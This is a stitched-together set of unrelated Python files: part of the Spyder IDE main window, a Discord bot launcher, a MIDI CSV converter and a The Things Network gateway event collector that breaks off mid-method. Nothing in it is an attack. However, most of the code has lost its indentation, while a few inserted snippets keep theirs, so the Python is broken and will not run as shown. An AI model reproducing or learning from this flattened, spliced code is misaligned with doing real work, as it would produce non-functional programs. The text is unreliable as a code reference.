def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled(readwrite_editor
and widget.document().isUndoAvailable())
self.redo_action.setEnabled(readwrite_editor
and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
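# Worked micro-example (hypothetical paths) of the contract above: keys are
# paths, values mark them active (True) or inactive (False), and only the
# active entries survive the filter in get_spyder_pythonpath():
#     path_dict = OrderedDict([('/some/path', True),
#                              ('/some/other/path', False)])
#     [k for k, v in path_dict.items() if v]  ->  ['/some/path']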
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except Exception:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while True:
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
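# A minimal client-side sketch (not part of Spyder) of the protocol served
# above: a second process connects to the configured port, sends the file
# path encoded as UTF-8, and waits for the single-byte b' ' acknowledgment.
def _example_send_to_open_files_server(fname, port=OPEN_FILES_PORT):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect(('127.0.0.1', port))
        client.sendall(fname.encode('utf-8'))
        client.recv(1)  # server answers with b' ' once the file is queued
    finally:
        client.close()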
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixels on top make it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when they are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=None):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
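# Net effect of the patches above (illustrative, not executed here): user
# code run inside Spyder that calls QtWidgets.QApplication(sys.argv) gets the
# do-nothing FakeQApplication instead of spawning a second Qt app, exec_()
# returns immediately because the real mainloop is already running, and
# sys.exit() becomes a no-op, so it cannot tear down the IDE process.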
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
main.py
|
# ==============================================================================
# run this file to run the bot
# ==============================================================================
from commands_help import *
'''
# uncomment if you want to run in cloud
# (also requires: from flask import Flask; from threading import Thread)
app = Flask('')
@app.route('/')
def home():
return "Hi there hello."
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
'''
@client.event
async def on_ready():
print('\nLayla II is online.\n')
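# Hedged sketch of a second event hook on the same client object exposed by
# commands_help (on_disconnect is a standard discord.py event):
@client.event
async def on_disconnect():
    print('Layla II lost its connection to Discord.')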
if __name__ == '__main__':
#keep_alive() # uncomment if you want to run in cloud
client.run(Bot.token)
|
convert_long.py
|
import os, csv, threading, subprocess, sys
tempo = 96 * 4
def write_music(music1, length):
return '''0, 0, Header, 1, 2, 480
1, 0, Start_track
1, 0, Title_t, "Test"
1, 0, Time_signature, 3, 3, 96, 8
1, 0, Tempo, 300000
1, 0, End_track
2, 0, Start_track
2, 0, Instrument_name_t, "Church Organ"
2, 0, Program_c, 1, 19
'''+music1+'''2, '''+length+''', End_track
0, 0, End_of_file'''
def write_line(time, note, action):
time_native = time * tempo
note_num = ord(note)
return ("2, "+str(time_native)+", "+action+", 0, "+str(note_num)+", 127")
def get_length(music1):
# Return the timestamp column of the last emitted event line.
last = music1[-1]
return last.split(",")[1]
def run(file):
print(file)
with open(file, encoding="utf-8", errors="replace") as f:
reader = csv.reader(f)
music = []
output = []
playing = ""
for row in reader:
music += row
# Walk the time steps; each entry of music is the string of notes
# sounding at that step.
for time, notes in enumerate(music, start=1):
for note in notes:
if note not in playing:
# The note just started sounding: emit a Note_on event.
output.append(write_line(time, note, "Note_on_c"))
playing += note
for note in playing:
if note not in notes:
# The note stopped sounding: emit a Note_off event.
playing = playing.replace(note, "")
output.append(write_line(time, note, "Note_off_c"))
with open(""+file+"short", 'w') as myfile:
music_str = ""
for i in output:
music_str += i+"\n"
myfile.write(write_music(music_str, get_length(output)))
name = myfile.name
try:
# Pass an argument list so this works without a shell on all platforms
subprocess.call(["csvmidi", name, name + ".mid"])
except OSError:
os.system("csvmidi " + name + " " + name + ".mid")
def start(files):
for i in files:
t = threading.Thread(target=run, args=(i,))
t.start()
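# Hedged usage sketch: convert every midicsv file passed on the command line,
# one thread per file (assumes the csvmidi tool from the midicsv suite is on
# PATH, as required by run() above).
if __name__ == '__main__':
    start(sys.argv[1:])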
|
TTNv3Collector.py
|
import os
import threading
import json
import pycurl
from datetime import datetime
from time import sleep
import dateutil.parser
import auditing.datacollectors.utils.PhyParser as phy_parser
from auditing.datacollectors.BaseCollector import BaseCollector
from auditing.datacollectors.utils.PacketPersistence import save, save_parsing_error, save_login_error, \
notify_test_event
from auditing.db.TTNRegion import TTNRegion
STREAM_TIMEOUT = 1800 # 30 mins
stream_eu1_url = os.environ.get('STREAM_EU1_URL', 'https://eu1.cloud.thethings.network/api/v3/events')
stream_nam1_url = os.environ.get('STREAM_NAM1_URL', 'https://nam1.cloud.thethings.network/api/v3/events')
stream_au1_url = os.environ.get('STREAM_AU1_URL', 'https://au1.cloud.thethings.network/api/v3/events')
class TTNv3Collector(BaseCollector):
"""
This collector establishes a connection to a thethingsnetwork.com account and
retrieves data from the https://<region>.cloud.thethings.network/api/v3/events endpoint using Curl.
The steps to retrieve gateway payloads:
1- Connect to the stream event using the values gateway_name and api_key provided by the user.
2- Handle messages with the message() function.
There are different kinds of messages, the most important are:
* gateway downlink and gateway uplink: this is, uplink and downlink data messages
(PHYpayload) as well as radio metadata. Uplinks are received under the name "gs.up.receive" and downlinks under the name "gs.down.send".
* join requests, which are received under the name "gs.up.receive", and join accept, which come under the name "gs.down.send".
* gateway status: it provides the location of the gateway. Come under the name "gs.status.receive".
About the functioning of this collector:
1- It's instantiated in the Orchestrator, and it's started by executing connect()
method.
2- In connect() a thread is launched to start the stream, where new messages are checked every second and processed. The connection is restarted every 30 minutes to avoid the disconnection from the server.
"""
def __init__(self, data_collector_id, organization_id, api_key, gateway_name, region_id, verified):
super().__init__(data_collector_id=data_collector_id,
organization_id=organization_id, verified=verified)
self.api_key = api_key
self.gateway_name = gateway_name
self.region = TTNRegion.find_region_by_id(int(region_id))
self.last_seen = None
self.manually_disconnected = None
self.packet_writter_message = self.init_packet_writter_message()
self.stream_thread = None
self.location = dict()  # Last gateway location reported via gs.status.receive
self.being_tested = False
def connect(self):
if self.stream_thread is None:
super(TTNv3Collector, self).connect()
self.stream_thread = threading.Thread(
target=self.run_stream, args=())
self.stream_thread.daemon = True
self.stream_thread.start()
else:
self.log.error(
f'Error starting stream thread for gw {self.gateway_name}, another thread is alive')
def on_receive(self, data):
decoded_data = data[:-2].decode() # Each message ends with '\n\n'
# If more than one message was read, we have to split them and
# process each one independently
decoded_data = decoded_data.split('\n\n')
for msg in decoded_data:
self.message(msg)
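# Worked example of the framing above: a chunk holding two events,
# b'{"x":1}\n\n{"y":2}\n\n', loses its trailing '\n\n' and splits into
# ['{"x":1}', '{"y":2}'], each of which is passed to message() separately.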
def run_stream(self):
init_connection = True
headers = [
'Accept: text/event-stream',
'Authorization: Bearer ' + self.api_key
]
post_data = {'identifiers': [
{'gateway_ids': {'gateway_id': self.gateway_name}}
]}
if self.region == 'eu1':
stream_url = stream_eu1_url
elif self.region == 'nam1':
stream_url = stream_nam1_url
elif self.region == 'au1':
stream_url = stream_au1_url
else:
# Guard against an unknown region leaving stream_url unbound
self.log.error(f'Unknown TTN region {self.region} for gw {self.gateway_name}')
return
while True:
if init_connection:
curl = pycurl.Curl()
curl.setopt(pycurl.HTTPHEADER, headers)
curl.setopt(pycurl.URL, stream_url)
curl.setopt(pycurl.WRITEFUNCTION, self.on_receive)
curl.setopt(pycurl.POSTFIELDS, json.dumps(post_data))
curl.setopt(pycurl.TIMEOUT, STREAM_TIMEOUT)
multi_curl = pycurl.CurlMulti()
multi_curl.add_handle(curl)
init_connection = False
multi_curl.perform()
status_code = curl.getinfo(pycurl.RESPONSE_CODE)
if status_code == 0:
sleep(1)
elif status_code == 200:
if self.being_tested:
notify_test_event(self.data_collector_id,
'SUCCESS', 'Connection successful')
self.stop_testing = True
self.connected = 'CONNECTED'
self.manually_disconnected = None
while True:
if self.manually_disconnected:
curl.close()
multi_curl.close()
del multi_curl, curl
return
multi_curl.perform()
error = curl.errstr()
if error == '':
pass
elif 'Operation timed out' in error:
# Restart the connection every STREAM_TIMEOUT secs
curl.close()
multi_curl.close()
init_connection = True
break
else:
self.connected = 'DISCONNECTED'
curl.close()
multi_curl.close()
del multi_curl, curl
self.log.error(
f'Error reading data in TTNCollector ID {self.data_collector_id}: {error}')
return
sleep(1)
else:
self.connected = 'DISCONNECTED'
curl.close()
multi_curl.close()
del multi_curl, curl
if self.being_tested:
notify_test_event(self.data_collector_id,
'ERROR', 'Connection failed')
self.stop_testing = True
else:
save_login_error(self.data_collector_id)
return
def disconnect(self):
self.manually_disconnected = True
self.connected = 'DISCONNECTED'
if self.being_tested:
self.log.info(
f'Stopping test connection to DataCollector ID {self.data_collector_id}')
else:
self.log.info(
f'Manually disconnected to gw: {self.gateway_name}')
sleep(2)
if self.stream_thread is None:
self.log.info(
f'Stream thread from gw {self.gateway_name} is already closed')
elif self.stream_thread.is_alive():
self.log.error(
f'Error stopping stream thread for gw {self.gateway_name}: thread is alive')
else:
self.stream_thread = None
super(TTNv3Collector, self).disconnect()
def verify_payload(self, msg):
        # If we managed to log into TTN, we can be sure we're receiving TTN
        # messages, so the verification code below is commented out
return True
# if not self.has_to_parse:
# return True # NOT SURE if this should be True or False
# phyPayload = msg.get('payload', None)
# if not phyPayload:
# self.log.error("Payload not present in message")
# return False
# try:
# phy_parser.setPHYPayload(phyPayload)
# return True
# except Exception as e:
# self.log.error(f'Error parsing physical payload: {e}')
# return False
def message(self, raw_message):
if self.being_tested:
return
try:
message = json.loads(raw_message)['result']
message_data = message.get('data')
name = message.get('name')
if name == 'events.stream.start':
return
elif name == 'gs.up.receive' or name == 'gs.down.send':
self.has_to_parse = True
else:
self.has_to_parse = False
if not self.verified:
# TTN collectors only verify the physical payload, which is only parsed if has_to_parse is True
if not self.verify_message(message):
self.log.debug(
f'Collector is not yet verified ({self.verified_packets} verified), skipping message\n')
return
# Message processing
if name == 'gs.status.receive' and message_data.get('antenna_locations', None):
# Check if the location is given in this message. If so, save it and add it in subsequent messages
try:
self.location['longitude'] = message_data.get(
'antenna_locations')[0].get('longitude')
self.location['latitude'] = message_data.get(
'antenna_locations')[0].get('latitude')
self.location['altitude'] = message_data.get(
'antenna_locations')[0].get('altitude')
except Exception as e:
self.log.error(
f'Error when fetching location in TTNCollector: {str(e)} Message: {raw_message}')
# Save the message that originates the packet
self.packet_writter_message['messages'].append(
{
'topic': None,
'message': raw_message[0:4096],
'data_collector_id': self.data_collector_id
}
)
self.last_seen = datetime.now()
if self.has_to_parse:
packet = phy_parser.setPHYPayload(
message_data.get('raw_payload'))
packet['chan'] = None
packet['stat'] = None
rx_metadata = message_data.get('rx_metadata', None)
if rx_metadata:
packet['lsnr'] = rx_metadata[0].get('snr', None)
packet['rssi'] = rx_metadata[0].get('rssi', None)
else:
packet['lsnr'] = None
packet['rssi'] = None
tmst = message.get('time', None)
if tmst:
packet['tmst'] = datetime.timestamp(
dateutil.parser.parse(tmst))
else:
packet['tmst'] = None
if name == 'gs.up.receive':
settings = message_data.get('settings', None)
if settings:
packet['freq'] = int(settings.get(
'frequency', None))/1000000
packet['codr'] = settings.get('coding_rate', None)
else:
packet['freq'] = None
packet['codr'] = None
else: # name == 'gs.down.send':
request = message_data.get('request', None)
